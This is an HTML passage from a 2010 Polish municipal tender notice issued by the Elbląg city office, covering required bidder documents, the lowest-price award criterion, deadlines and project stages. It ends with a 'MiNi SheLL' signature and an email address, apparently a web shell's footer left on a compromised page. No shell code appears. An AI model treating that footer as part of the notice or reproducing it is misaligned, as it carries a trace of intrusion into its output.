<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie w zakresie art. 25 ust. 1 pkt 2 ustawy Prawo zamówień publicznych.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty stanowiące dowód, że Wykonawca będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności pisemne zobowiązanie podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - w przypadku Wykonawcy polegającego na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umelblag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Elblągu
Wydział Zamówień Publicznych pokój 125 
82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2010 godzina 09:30, miejsce: Urząd Miejski w Elblągu Wydział Zamówień Publicznych
82-300 Elbląg ul. Łączności 1, pokój 125.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Dotyczy Sekcji II.2) ogłoszenia CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA
data rozpoczęcia: data udzielenia zamówienia
data zakończenia: do 31 grudnia 2010 r.
w tym:
I etap  	- 3 tygodnie od daty udzielenia zamówienia
II etap 	- do dnia 30 maja 2010 r.
III etap	- do dnia 30 września 2010 r.
IV etap 	- do dnia 31 grudnia 2010 r.

2. Opłata za SIWZ obejmuje koszty jej druku oraz przekazania.

3. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych   
    dokumentów i oświadczeń wymienionych w pkt VI.1. SIWZ, metodą spełnia / nie spełnia.

    UWAGA:
Zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com